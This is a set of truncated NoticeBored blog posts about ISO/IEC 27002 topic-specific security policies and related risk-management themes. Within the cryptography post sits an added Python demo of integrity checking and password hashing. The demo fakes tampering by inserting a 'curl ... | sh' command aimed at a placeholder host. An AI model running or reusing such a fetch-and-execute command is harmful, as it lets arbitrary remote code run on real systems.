Take for instance the corporate responses to COVID-19. Out of necessity, organisations in lockdown shifted rapidly from on-site office work and in-person meetings to home-working, using video conferencing, email and collaborative approaches. Although that may have been a purely reactive, un-pre-planned response to the global crisis that erupted (despite prior pandemics and warnings arising from increasing international travel), it was facilitated by longer-term planned, strategic changes and investments in a resilient workforce with flexible working practices and positive attitudes, strong relationships within and without the organisation, plus appropriate tools and technologies - in particular the cloud (since about 2000) and, of course, IT (since about 1970).

Thinking about it, the very concept of 'office work', or indeed 'work', stretches back still further, along with 'business', 'commerce', 'profit' and 'money'. Gradual shifts in human society on an almost evolutionary scale have led to where we are right now ... and will continue going forward, presenting strategic challenges and opportunities to those who are awake to the possibilities ahead (both positive and negative), sufficiently resilient to cope with adversity yet resourceful, strong enough and well-positioned to surge forward when it makes sense.

In some organisations, policies and practices for home/virtual working were hastily developed and adopted during and in response to the COVID outbreak. In others, either the policies and practices were already in place, or there was no specific need for them since flexible, tech-enabled working was very much the norm already. A few laggards are still struggling to catch up even today, and failing to thrive in adversity may mean failing to survive in perpetuity.
[Aside: how on Earth can today's politicians justify holding a climate change conference as a physical, in-person event, during COVID no less, rather than virtually, on-line? Are we even on the same planet? Shakes head in disbelief.]

The relation goes both ways: policies can prompt strategic changes, and vice versa. Thinking forward, virtual working presents opportunities for global collaboration on an unprecedented scale, with reduced costs, increased efficiencies, access to a global talent pool and of course global markets. 'Globalization' is not just about establishing a widespread physical presence and brands: it's also about harnessing a widely distributed and culturally diverse workforce, harnessing technology to link, leverage and exploit the very best of the best.

2021-11-27T09:26:57+00:00 http://blog.noticebored.com/2021/11/weaving-strategies-with-policies.html www.secnews.physaphae.fr/article.php?IdArticle=3712965

Topic-specific policies 12/11: concluding the series

Congratulations on completing this cook's tour of the topic-specific information security policies in ISO/IEC 27002:2022 (forthcoming). Today we reach the end of the track, reflecting back on our journey and gazing forward to the next objective.

Through the blog, we have stepped through the eleven topic-specific policy examples called out in clause 5.1, discussing various policy-related matters along the way:

0. Introduction: an initial overview of the classical 'policy pyramid'.
1. Access control: 'policy axioms' are key principles underpinning policies.
2. Physical and environmental security: ignore these aspects at your peril!
3. Asset management: using templates/models to develop your policies.
4. Information transfer: consider the business context for policies.
5. Networking security: risks associated with data and social networks.
6. Information security incident management: unique or general?
7. Backup: there's more to information risk management than cyber!
8. Cryptography and key management: important for

2021-11-05T13:07:47+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/D8ssTjmdNBM/topic-specific-policies-1211-concluding.html www.secnews.physaphae.fr/article.php?IdArticle=3611157

Topic-specific example 11/11: secure development

ISO/IEC 27002:2022 is another potential nightmare for the naïve and inexperienced policy author. Despite the context, the title of the standard's policy example ("secure development") doesn't explicitly refer to software or IT. Lots of things get developed - new products for instance, business relationships, corporate structures and so on. Yes, even security policies get developed! Most if not all developments involve information (requirements/objectives, specifications, plans, status/progress reports etc.) and potentially substantial information risks ... so the policy could cover those aspects, ballooning in scope from what was presumably intended when the standard was drafted.

Even if the scope of the policy is constrained to the IT context, the information security controls potentially required in, say, software development are many and varied, just as the development and associated methods are many and varied, and more poignantly so are the information risks. Your homework challenge, today, is to consider, compare and contrast these five markedly different IT development scenarios:

- Commercial firmware being developed for a small smart actuator/sensor device (a thing) destined to be physically embedded in the pneumatic braking system of commercial vehicles such as trucks and coaches, by a specialist OEM supplier selected on the basis of lowest price.
- A long-overdue technical update and refresh for a German bank's mature financial management application, developed over a decade ago by a team of contractors long since dispersed or retired, based on an obsolete database, with fragmentary documentation in broken English and substantial compliance implications, being conducted by a large software house based entirely in India.
- A cloud-based TV program scheduling system for a global broadcaster, to be delivered iteratively over the next two years by a small team of contractors under the management of a consultancy firm, for a client that freely admits it barely understands phase 1 and essentially has no idea what might be required next, or when.
- A departmental spreadsheet for time recording by home workers, so their time can be tracked and recharged to clients, and their productivity can be monitored by management.
- Custom hardware, firmware and autonomous software required for a scientific exploration of the Mariana Trench - to be deployed in the only two deep-sea drones in existence that are physically capable of delivering and recovering the payload at the extreme depths required.

You may have worked in or with projects/initiatives vaguely similar to one, maybe even two or three of these, but probably not all five - and these are just a few random illustrative examples plucked from the millions of such activities going on right now.
The sheer number and variety of possibilities is bewildering, so how on earth can one draft a sensible policy? As is the way with ISO27k, the trick is to focus on the information

2021-10-23T16:00:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/9OkGaAP3f2E/topic-specific-example-1111-secure.html www.secnews.physaphae.fr/article.php?IdArticle=3551830

Topic-specific example 10/11: management of technical vulnerabilities

ISO/IEC 27002:2022, "management of technical vulnerabilities" is the kind of phrase that speaks volumes to [some, switched-on, security-aware] IT pros ... and leaves ord'nry folk perplexed, befuddled and nonplussed. In this case, that may be appropriate if it aligns with the intended audience for the policy, perhaps not if the policy needs to be read, understood and complied with by, say, workers in general, for whom "patching" is arguably a more apt and widely-known term.

So, do you need to tell workers to keep their IT systems, smartphones and IoT things up to date with security patches? If so, before launching into the policy development process, think very carefully about the title, content and style of your policy - plus the associated procedures, guidelines, awareness and training materials, help-desk scripts or whatever you decide is necessary to achieve your information risk management objectives in this regard (more on that below).

Hinson tip: what are your information risk management objectives in this regard (concerning 'technical vulnerabilities' ... or whatever aspects you believe need addressing)? What information risks are you facing, how significant are they (relative to other things on your plate) and how do you intend to treat them? Seriously, think about it. Talk it through with your peers and professional colleagues. Draft a cunning treatment plan for this particular subset of information risks, discuss it with management and refine it.
Lather, rinse, repeat until you achieve consensus (or wear down the blockers and negotiate a fragile settlement), and finally you are primed to craft your policy.

Once more, we have your starter-for-ten, a generic patching policy template designed to help get you smartly off the starting blocks:

While we don't presently offer a policy template on vulnerability disclosures (something worth adding to our to-do list, maybe?), we do have others that are to some extent relevant to this topic, for instance on change and configuration management and information systems security. I'll pick up on that point at the end of this blog series.

Aside f

2021-10-22T16:00:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/oP9rTVTtvmM/topic-specific-example-1011-management.html www.secnews.physaphae.fr/article.php?IdArticle=3547340

Topic-specific policy 9/11: information classification and handling

classification policy template, I'm reluctant to recommend classification as a general approach unless it is mandated for your organisation ... in which case your class/category definitions, processes and handling rules are probably already specified by whoever mandated it (perhaps in law), so you would need to check/update the template accordingly.

In summary, the template is here, a basic classification policy starter for just $20. It's not one of the topic-specific policy examples I personally would have selected for the standard, though, and I have serious reservations about the corresponding controls in section 5.
To me, it's an outdated, unhelpful and largely irrelevant approach - except perhaps for the

2021-10-21T15:57:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/iTpvsXkz-II/topic-specific-policy-911-information.html www.secnews.physaphae.fr/article.php?IdArticle=3541311

Topic-specific policy 8/11: cryptography and key management

ISO/IEC 27002 and picked as a topic-specific policy example for the forthcoming 3rd edition in order to include something directly relevant to governmental organisations, although to be fair crypto is a consideration for all of us these days. Many (most?) websites are now using HTTPS with TLS for encryption, for example, while cryptographic methods are commonly used for file and message integrity checks, such as application/patch installers that integrity-check themselves before proceeding, and password hashing.

Here's a glimpse of one I prepared earlier:

Like all our templates, this one is generic. Organisations with specific legal or contractual obligations in this area (such as governmental and defence companies bound to employ particular algorithms, key lengths and technologies such as physically secure hardware crypto modules, or companies bound by PCI-DSS) would need to adapt it accordingly. You'll see that it mentions the Information Classification Policy: I'll have more to blog about classification tomorrow.

If you've been tagging along on my tiki-tour of the topic-specific policy examples in ISO/IEC 27002:2022, and if you read that LinkedIn piece by Chris Hall that I recommended, you will probably by now recognise the standard document structure we've adopted for all our policy templates.
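The post above mentions two everyday cryptographic controls that a policy of this kind would govern: installers that integrity-check themselves before proceeding, and password hashing. The Python below is an added illustration of both, not code from the NoticeBored post or from the SecAware template it describes. The installer bytes, the "published" digest and the iteration count are constructed assumptions for the example; in practice the expected digest would come from a separately authenticated source such as a signed release manifest.

```python
"""Added example (not from the NoticeBored post or SecAware templates):
integrity-checking a package against a published SHA-256 digest, and
salted PBKDF2 password hashing with constant-time verification.
All sample data is constructed for the example."""
import hashlib
import hmac
import os
from typing import Optional

# Constructed sample installer and the digest its publisher would ship with
# it. Computed here so the example is self-contained; a real check would take
# the expected digest from a separately authenticated manifest, never from
# the same download as the file being checked.
INSTALLER_BYTES = b"#!/bin/sh\necho installing example-tool 1.2.3\n"
PUBLISHED_SHA256 = hashlib.sha256(INSTALLER_BYTES).hexdigest()


def verify_integrity(data: bytes, expected_hex: str) -> bool:
    """True only if SHA-256(data) equals the published digest.

    hmac.compare_digest is used rather than == so the comparison does not
    reveal, via timing, how many leading characters matched."""
    actual_hex = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual_hex, expected_hex)


# Assumed work factor for the example; tune to your own hardware and policy.
PBKDF2_ITERATIONS = 600_000
SALT_BYTES = 16


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing record: pbkdf2_sha256$iterations$salt$hash.

    A fresh random salt per password means two users with the same password
    store different values, and precomputed hash tables are useless. The
    iteration count is stored so it can be raised later without breaking
    existing records."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                                 PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute the hash with the stored salt and iteration count and
    compare in constant time. Malformed or foreign records verify as False
    rather than raising, so a corrupt row cannot crash the login path."""
    try:
        scheme, iterations, salt_hex, hash_hex = stored.split("$")
        if scheme != "pbkdf2_sha256":
            return False
        digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                     bytes.fromhex(salt_hex), int(iterations))
    except ValueError:
        return False
    return hmac.compare_digest(digest.hex(), hash_hex)


if __name__ == "__main__":
    # Constructed tampering: a one-byte change anywhere flips the verdict.
    tampered = INSTALLER_BYTES.replace(b"echo", b"curl http://example.invalid | sh; echo")
    print("genuine installer ok:", verify_integrity(INSTALLER_BYTES, PUBLISHED_SHA256))
    print("tampered installer ok:", verify_integrity(tampered, PUBLISHED_SHA256))
    record = hash_password("correct horse battery staple")
    print("stored record:", record)
    print("right password:", verify_password("correct horse battery staple", record))
    print("wrong password:", verify_password("Tr0ub4dor&3", record))
```

The two halves illustrate the policy points a crypto template usually has to pin down: where the trusted reference value comes from (the digest is only as good as the channel it arrived over), and which algorithm, salt length and work factor are mandated, with the parameters recorded alongside each hash so they can be rotated.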
The main elements are:

- Page header with a logo (our logo in the template, yours to download and customise) and a short, pithy, catchy policy title.
- Information security policy up-front to be crystal clear about the nature and ownership of the policy, since some topics could equally belong to other corporate functions (e.g. our "Fraud" policy template is, in fact, an information security policy addressing the information risks associated with fraud, misrepresentation and so on, not an HR or legal policy about disciplinary procedures and compliance).
- Policy title, big and bold to stand out. The precise wording is important here (I'll return to that point in another blog piece).
- Policy summary, outlining

2021-10-20T16:00:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/fh9i03AKXT4/topic-specific-policy-811-cryptography.html www.secnews.physaphae.fr/article.php?IdArticle=3534956

Topic-specific policy 7/11: backup

ISO/IEC 27002:2022, spanning the divide between 'cybersecurity' and 'the business'.

Why do data need to be backed up? What's the purpose? How should it be done? Questions like these immediately spring to mind (mine anyway!) when I read the recommendation for a topic-specific policy on backup ... but as usual, there's more to it than that.

Play along with me on this worked example. If you already have a backup policy (or something with a vaguely similar title), I urge you to dig it out at this point and study it (again!) before returning to read the remainder of this blog. Think about it. Does it address those three questions? What else does it cover? What is its scope? Is it readable, understandable, motivational - not just for you but for its intended audience/s? Does it state who those audiences are? Any spelling mistakes, grammatical errors or layout problems? Is it lengthy, officious, boring? Conversely, is it short, cryptic and puzzling?
Is it more of a detailed plan for what backups to do, when and how, than a clear and unequivocal statement of management's overall expectations re backups? Is it consistent both internally (no contradictions or omissions) and externally (e.g. does it accord with other policies and adequately reflect any applicable compliance requirements)? All good so far? If not, hopefully this blog series has given you food for thought! Either way, what is it missing? What relevant matters does your backup policy not cover, either failing to mention them at all or perhaps gloss over them too superficially to have any impact?That's a harder question to answer, even if you were the one who wrote the existing policy. We all (me included!) tend to focus on our areas of interest and expertise. Policies are often formulated and written with particular scenarios, situations or incidents in mind, typically forming part of the response that drives continuous improvement. We don't always take the trouble to consult with colleagues, research the topic, explore the risks and controls, and think both broadly and deeply about the subject area - the topic of the policy. Frankly, we just don't think, failing to recognise and address our own biases and failings. Don't agree? OK, look again at the start of my second paragraph. I consciously slipped "data" in there, just as I deliberately mentioned "cyber" in the first one. Did you even notice the bias towards IT? Is your backup policy exclusively about backing up computer data, most likely digital data from corporate IT systems? Does it lay out the technologies, plus the frequencies and types of backup, in some detail?Don't get me wrong, that's a very important topic, essential in fact for virtually all modern organisations and indeed individuals today. 
My concern is that it still only covers part of the problem space, a peak on the risk landscape you could say.

What about information in other forms and locations:

2021-10-19T16:00:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/FKLN3ASz1BU/topic-specific-policy-711-backup.html www.secnews.physaphae.fr/article.php?IdArticle=3529756

Topic-specific policy 6/11: information security incident management

ISO/IEC 27002, being the only one of eleven example titles in the standard that explicitly states "information security". I ask myself why? Is there something special about the management of events classed as 'information security incidents', as opposed to other kinds? Hmmmm, yes there are some specifics but I'm not entirely convinced of a need for a distinct, unique policy. I feel there is more in common with the management of all kinds of incident than there are differences in respect of infosec incidents, hence "Incident management policy" makes more sense to me.

Here's one I prepared earlier.

Organisations deal with events and incidents all the time. Aside from the humdrum routines of business, things don't always go to plan and unexpected situations crop up. Mature organisations typically have incident management policies already, plus the accompanying procedures and indeed people primed and ready to respond to 'stuff' at the drop of a hat. Wouldn't it make sense, therefore, to ensure that "information security incidents" are handled in much the same way as others?

That's fine for mature organisations. For the rest, the SecAware information security policy template on incident management concentrates on the specifics of infosec incidents and outlines incident management in general.
A workable infosec policy can prompt the development and maturity of incident management by:

- Documenting and formalising things - particularly the process, expressing management's expectations and requirements in clear terms (e.g. striking the right balance between investigating and resolving incidents, especially where business continuity is a factor).
- Stabilising the working practices, de-cluttering things, making them more consistent and hence amenable to management control.
- Enabling reviews and audits, leading to systematic process improvement where appropriate.
- Discouraging inappropriate shortcuts (e.g. ineptly investigating serious issues, compromising important forensic evidence) while facilitating escalation and management decisions where appropriate (e.g. determining whether forensic investigation is justified).

2021-10-18T20:19:51+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/U2aFEkEyMwc/topic-specific-policy-611-information.html www.secnews.physaphae.fr/article.php?IdArticle=3526425

Topic-specific policy 5/11: networking security

a policy template. I alluded to this at the end of the last blog piece as one of several security policies relating to information transfer:

Less obviously, there are also potentially significant information risks and security controls applicable to social networking and social media ... and yes, we have a policy template for that too:

Although 'social media' generally refers to Facebook, Twitter, LinkedIn and the like, many of the information risks pre-date them, back to the days of in-person personal and business interactions through professional membership organisations, special interest groups, town hall meetings, breakfast clubs and chambers of commerce.
Other comms technologies such as the telephone, email and videoconferencing, plus 'groups' and collaborative working, have dramatically expanded our opportunities for social contact, and also materially increased our exposure to global threats. Globalisation is a far bigger issue than 'networking' implies, with pros and cons.

On the upside, ready access to peers, knowledgeable and experienced colleagues and heaps of advice through the Internet makes high quality information very available. It's a fantastic resource for the connected global community. On the downside, the sheer volume and variety of information online can be overwhelming. It is tricky to distinguish and sift the wheat from the chaff. Even your ninja Googling skills can only go so far! That dips into the realm of mis/disinformation, bias and fraud, further areas where well-written corporate policies can help.

2021-10-16T18:08:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/HT5HCcBNbVE/topic-specific-policy-511-networking.html www.secnews.physaphae.fr/article.php?IdArticle=3522631

Topic-specific policy 4/11: information transfer

"Information transfer" is another ambiguous, potentially misleading title for a policy, even if it includes "information security". Depending on the context and the reader's understanding, it might mean or imply a security policy concerning:

- Any passage of information between any two or more end points - network data communications, for instance, sending someone a letter, speaking to them or drawing them a picture, body language, discussing business or personal matters, voyeurism, surveillance and spying etc.
- One-way flows or a mutual, bilateral or multilateral exchange of information.
- Formal business reporting between the organisation and some third party, such as the external auditors, stockholders, banks or authorities.
- Discrete batch-mode data transfers (e.g. sending backup or archival tapes to a safe store, or updating secret keys in distributed hardware security modules), routine/regular/frequent transfers (e.g. strings of network packets), sporadic/exceptional/one-off transfers (e.g. subject access requests for personal information) or whatever.
- Transmission of information through broadcasting, training and awareness activities, reporting, policies, documentation, seminars, publications, blogs etc., plus its reception and comprehension.
- Internal communications within the organisation, for example between different business units, departments, teams and/or individuals, or between layers in the management hierarchy.
- "Official"/mandatory, formalised disclosures to authorities or other third parties.
- Informal/unintended or formal/intentional communications that reveal or disclose sensitive information (raising confidentiality concerns) or critical information (with integrity and availability aspects).
- Formal provision of valuable information, for instance when a client discusses a case with a lawyer, accountant, auditor or some other professional.
- Legal transfer of information ownership, copyright etc. between parties, for example when a company takes over another or licenses its intellectual property.

Again there are contextual ramifications. The nature and importance of information transfers differ between, say, hospitals and health service providers, consultants and their clients, social media companies and their customers, and battalion HQ with operating units out in the field. There is a common factor, however, namely information risk.
The in

2021-10-15T12:40:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/MHAW1fkbrQs/topic-specific-policy-411-information.html www.secnews.physaphae.fr/article.php?IdArticle=3516936

Topic-specific policy 3/11: asset management

This piece is different to the others in this blog series. I'm seizing the opportunity to explain the thinking behind, and the steps involved in researching and drafting, an information security policy through a worked example. This is about the policy development process, more than the asset management policy per se. One reason is that, despite having written numerous policies on other topics in the same general area, we hadn't appreciated the value of an asset management policy, as such, even allowing for the ambiguous title of the example given in the current draft of ISO/IEC 27002:2022.

The standard formally but (in my opinion) misleadingly defines asset as 'anything that has value to the organization', with an unhelpful note distinguishing primary from supporting assets. By literal substitution, 'anything that has value to the organization management' is the third example information security policy topic in section 5.1 ... but what does that actually mean?

Hmmmm. Isn't it tautologous? Does anything not of value even require management? Is the final word in 'anything that has value to the organization management' a noun or verb i.e. does the policy concern the management of organizational assets, or is it about securing organizational assets that are valuable to its managers; or both, or something else entirely?
Well, OK then, perhaps the standard is suggesting a policy on the information security aspects involved in managing information assets, by which I mean both the intangible information content and (as applicable) the physical storage media and processing/communications systems such as hard drives and computer networks?

Seeking inspiration, Googling 'information security asset management policy' found me a policy by Sefton Council along those lines: with about 4 full pages of content, it covers security aspects of both the information content and IT systems, more specifically information ownership, valuation and acceptable use:

    1.2. Policy Statement
    The purpose of this policy is to achieve and maintain appropriate protection of organisational assets. It does this by ensuring that every information asset has an owner and that the nature and value of each asset is fully understood. It also ensures that the boundaries of acceptable use are clearly defined for anyone that has access to

2021-10-14T17:20:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/RzQfkTDBmhs/topic-specific-policy-311-asset.html www.secnews.physaphae.fr/article.php?IdArticle=3512451

Topic-specific policy 2/11: physical and environmental security

Yesterday I blogged about the "access control" topic-specific policy example in ISO/IEC 27002:2022.
Today's subject is the "physical and environmental security" policy example.

Physical security controls are clearly important for tangible information assets, including IT systems and media, documentation and people - yes, people.

The first "computers" were humans who computed numbers, preparing look-up tables to set up field guns at the right elevation and azimuth angles to hit designated targets at specific ranges given the wind speed and direction, terrain and ordnance - quite a lot of factors to take into account in the field, so the pre-calculated tables helped speed and accuracy, provided the gunners used them correctly anyway, and I'm sure they were highly trained and closely overseen!

Aside from a little mental arithmetic, most of us don't "compute" many numbers today but we still process staggering quantities of information flowing constantly from our senses and memories. In the work context, the trite mantra "Our people are our greatest assets" may be literally true, given the knowledge, experience, expertise and creativity of workers. We have valuable intangible proprietary and personal information locked in our heads, trade secrets, innovative ideas and more. We are information assets, although to be fair the true values vary markedly (and, yes, some are liabilities!). Why do you think some people are paid more than others?

Aside from the commercial value aspect, workers require adequate protection against unacceptable health and safety risks according to national laws and regulations. We also deserve respect, personal space, privacy, understanding, fair and reasonable compensation and so on, raising ethical and further legal or contractual obligations. Environmental protection ensures that workers have reasonably pleasant workplaces, partly for health and ethical reasons, partly for productivity reasons. Computer systems likewise work more reliably under manufacturer-specified ambient temperatures and require appropriate electricity supplies.
The total demands for cooling and power can be significant in a large computer room or data centre. Oh and don't forget the physical security and environmental controls for portable equipment and home offices - safe storage, for instance, plus security cables, etched corporate logos, good quality power supplies and UPSs, spare batteries and more.

Environmental controls relating to noxious by-products, greenhouse gases, dangerous emissions, excessive noise, explosive/flammable products, dangerous processes etc. are particularly important for chemical and manufacturing industries, among others ... but are they 'information security controls'? I would argue yes for some, perhaps most of them. For instance, electric valve and sluice gate controllers on a sewage treatment plant that are computerised and networked smart things are at risk from malware, hackers, inept system administration or configuration errors, software design flaws and programming bugs, mechanical problems, power glitches and more. So, there is clearly a wide variety of information risks and controls in this area, collectively presenting significant challenges in various organisatio

2021-10-13T15:59:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/4caQJ8iX83E/topic-specific-policy-211-physical-and.html www.secnews.physaphae.fr/article.php?IdArticle=3506842

Topic-specific policy 1/11: access control

ISO/IEC 27002 recommends having a topic-specific information security policy on "access control". OK, fine, so what would that actually look like, in practice?

Before reading on, think about that for a moment. Imagine if you were tasked to draft an access control policy, what would it cover? What form would it take? How would you even start? How about something along these lines, for starters:

What is access control intended to achieve?
In about half a page, the background section explains the rationale for controlling access to assets (meaning valuable things such as information in various forms, including but more than just digital data).

The policy goes on to state that, whereas access to information should be restricted where necessary, access by workers should be permitted by default unless there are legitimate reasons to restrict it. In other words, a liberal approach that releases information for use unless it needs to be restricted for some reason ... which in turn begs questions about what are those legitimate reasons? Who decides and on what basis?

The alternative approach is to restrict access to assets by default unless there are sound reasons to permit access, begging the same questions.

The template policy takes both approaches, in the form of these complementary 'policy axioms':

Policy axioms (guiding principles)

A. Access to corporate information assets by workers should be permitted by default unless there is a legitimate need to restrict it.

B. Access to corporate information assets by third parties should be restricted by default unless there is a legitimate need to permit it.
The idea is that, generally speaking, "workers" (which is defined elsewhere to include employees on the organization's payroll - staff and managers - plus third party employees and others such as interns, temps and consultants working for and on behalf of the organisation, under its co

2021-10-12T19:44:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/qlMa4Qxj6VM/topic-specific-policy-111-access-control.html www.secnews.physaphae.fr/article.php?IdArticle=3504314

ISO/IEC 27002's overall and topic-specific information security policies 0/11

Clause 5.1 of the forthcoming new 3rd edition of ISO/IEC 27002 recommends two complementary types of information security policies.

Firstly:

    At the highest level, organizations should define an "information security policy" which is approved by top management and which sets out the organization's approach to managing its information security.

The policy (singular) should address requirements derived from various sources, and include a bunch of general policy statements, for example laying out the organisation's commitments (as stated by senior management) to satisfy applicable requirements relating to information security, and to improve the information security management system continually. In addition:

    At a lower level, the information security policy should be supported by topic-specific policies, as needed to further mandate the implementation of information security controls. Topic-specific policies are typically structured to address the needs of certain target groups within an organization or to cover certain security areas. Topic-specific policies should be aligned and complementary to the information security policy of the organization.

Topic-specific policies (plural) should be aligned with and support the high-level policy, providing additional details in various areas. The standard lists 11 topics as examples ...
and I plan to talk about those day by day through this blog. After that, I'll write about integrating all the policies, including the top one, into a coherent and comprehensive policy suite - taking an holistic/system view of the entire policy structure. So, tune in tomorrow for the first of twelve enthralling episodes!

2021-10-11T15:57:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/cQz0fiLdAJk/isoiec-27002s-overall-and-topic.html www.secnews.physaphae.fr/article.php?IdArticle=3498120

An important lesson from the Farcebook Fiasco 2021

I gather from friends and the news media that there was an unplanned outage earlier this week at Facebook. I'm told that Facebook is a fairly popular social media platform - some have said addictive. As you can no doubt tell, I don't see the attraction and I'm definitely not hooked. If it weren't for the brouhaha, I wouldn't have even noticed.

I understand the outage was caused by a technical issue in the network - something to do with the BGP configuration. I'm not particularly interested in, and probably wouldn't even understand, the details. The self same issue locked Facebook's IT administrators out of their own systems, leaving them cut off and unable to address/reverse/fix the issue for several hours, causing mild panic and a little outrage among its users, customers and other stakeholders. The same issue took down related websites too. Doubtless the admins were stressed out, possibly frantic, while their managers were unimpressed.

I'm bringing it up here to point out a lesson for all other organisations, not just those reliant on remote system admin. If the network access is broken and unavailable, for whatever reason, remote admin is also broken and unavailable.
That's screamingly obvious to all of us now with 20/20 hindsight thanks to the Farcebook Fiasco, and clearly an issue worth addressing by organisations that use and rely on remote system/network/app/IT admin, of which I'm sure there are many. I'm told that cloud is in, and the Interwebs are quite useful.

Less obviously, the incident is a neat reminder that foresight is even more valuable, more specifically information risk management. Regardless of the nature of the technical issue and preceding activities that sparked the outage, single points of failure are a class of vulnerability well worth identifying and addressing, especially for anything important. The remedy is redundancy, more broadly known as defence-in-depth, an approach that is universally employed by all living organisms - except, it seems, Facebook IT people. As to how they might have mitigated the risks, there are several possible means of administering network systems aside from remote access through the same network (an out-of-band management path being the obvious one). I'm not even going to attempt to list them. Go ahead, Google if you care.

There are myriad ways that information services may be interrupted, some deliberate/intentional, many accidental, inadvertent or due to natural causes. It's simply impracticable to attempt to identify and deal with them all, individually, hence the value of a much more generalised approach to specifying, achieving, maintaining and being confident in the required availability. It's called resilience, a natural complement to contingency planning, both of which are parts of the nebulous approach called business continuity management.
That's more than enough waffle

Published 2021-10-07T14:24:08+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/E1sA9oaHVnY/an-important-lesson-from-farcebook.html

Pinball management

It could be argued that 'management' of all kinds (including information risk and security management) is, or rather should be, a rational process, meaning that managers should systematically gather and evaluate information, take account of sound advice, make sensible decisions, put in place whatever is necessary to implement the decisions etc., all the time acting in the organization's best interests, furthering its business objectives, strategies, policies etc. In practice, there are all manner of issues with that approach that complicate matters, frustrate things, and lead to 'suboptimal' situations that may be - or at least appear to be - irrational, inappropriate or unnecessary. In particular, there are numerous paradoxes. For example:

- The obvious core objective of a typical commercial company to make a substantial profit for its owners may conflict with various ethical and legal objectives to spend money on protecting and furthering the wider interests of society and individuals - including their privacy.
- There's a fine line between motivating/supporting/encouraging/directing and demotivating/micro-managing/exploiting employees.
- Efficiency in most matters comes at the cost of effectiveness, and vice versa.
- They say quality is free, but is that a lie?

Published 2021-07-29T16:36:24+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/XFApGQz-u1o/pinball-management.html

Managing certainty

'Reducing uncertainty' is the prime focus of information risk management today.
We do our level best to identify, characterise, quantify, evaluate and where possible reduce the probabilities and/or adverse consequences of various possible events. Uncertainty is an inherent part of the problems we typically face. We don't know exactly what might happen, nor how or when, and we aren't entirely sure about the consequences. We worry about factors both within and without our control, and about dependencies and complex interactions that frustrate our efforts to predict and control our fortunes. We adopt fallback and recovery arrangements, and apply contingency thinking with the intention of being better prepared and resourced for unanticipated situations ahead.

A random comment on LinkedIn set me thinking about the converse: 'reducing uncertainty' is the flip side of 'increasing certainty'; in other words, information risk management is equally about increasing certainty of beneficial, valuable outcomes such as not suffering the adverse consequences of incidents as often and/or as severely. It's also about increasing certainty in general, which is why we put so much effort into gathering and assessing information, monitoring and measuring things, implementing mitigating 'information security controls' that give us some semblance of control over the risks.

Assurance is a big part of reducing uncertainty. We check and test things, review stuff and conduct audits to increase both our knowledge of, and our confidence in, the arrangements. We seek to identify and tease out potential issues that need to be addressed in order to avoid nasty surprises.

Resilience is another chunk. Building the strength and capability to respond effectively and efficiently to whatever might happen, maintaining critical activities throughout, is a powerful approach that extends from individuals through families, teams and departments, to organisations, industries and society at large.

Thanks to those uncertainties, we are inevitably building on shaky foundations.
Our information risk management practices and information security controls are imperfect ... but at the same time they earn their keep by generating more value than they cost, for example by:

- Providing credible information about various situations, allowing us to make rational decisions, prioritise and plan things, allocate appropriate resources etc.;
- Reducing or constraining the problem space where possible, increasing our ability to focus on The Stuff That Really Matters;
- Allowing us to consider and deal with potential incidents in advance, knowing that we will struggle to do so during some future crisis.

Along with

Published 2021-07-11T09:37:45+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/DtnTA7HKLPQ/managing-certainty.html

Are our infosec controls sufficient?

Although it's tempting to dismiss such questions as rhetorical, trivial or too difficult, there are reasons for taking them seriously*. Today I'm digging a little deeper into the basis for posing such tricky questions, explaining how we typically go about answering them in practice, using that specific question as an example. OK, here goes.

The accepted way of determining the sufficiency of controls is to evaluate them against the requirements. Adroitly sidestepping those requirements for now, I plan to blabber on about the evaluation aspect or, more accurately, assurance.

Reviewing, testing, auditing, monitoring etc. are assurance methods intended to increase our knowledge. We gather relevant data, facts, evidence or other information concerning a situation of concern, consider and assess/evaluate it in order to:

- Demonstrate, prove or engender confidence that things are going to plan, working well, sufficient and adequate in practice, as we hope; and
- Identify and ideally quantify any issues, i.e. aspects that are not, in reality, working quite so well, sufficiently and adequately.
Assurance activities qualify as controls to mitigate risks, such as information risks associated with information risk and security management, e.g.:

- Mistakes in our identification of other information risks (e.g. failing to appreciate critical information-related dependencies of various kinds);
- Biases and errors in our assessment/evaluation of identified information risks (e.g. today's obsessive focus on "cyber" implies down-playing, perhaps even ignoring other aspects of information security, including non-cyber threats such as physical disasters and hum

Published 2021-06-26T17:27:23+00:00, http://feedproxy.google.com/~r/NoticeBored/~3/XARVjFUnZq8/are-our-infosec-controls-sufficient.html

Stepping on the cracks

Anyone seeking information security standards or guidance is spoilt for choice, e.g.:

- ISO27k - produced by a large international committee of subject matter experts and national representatives
- NIST SP 800 series - well researched, well written, actively maintained ... and FREE!
- IT Grundschutz - a typically thorough Germanic approach, to the point of absurdity (4,800 pages!)
- CSA - cloud security guidance is their home turf
- COBIT - takes a deliberately different perspective on 'risk' and 'control'
- Secure application development standards such as those from OWASP
- IT standards and methods as a whole: relevant because IT or cyber security is clearly a big part of information security
- HR, physical security, privacy and business continuity standards and methods as a whole: filling-in the substantial gaps in IT or cyber security
- Risk management standards, the best of which at least mention the importance of identifying and managing information risks
- PCI DSS - not really an infosec standard so much as a contractual mechanism forcing organizations using credit cards to play their part in maintaining card security

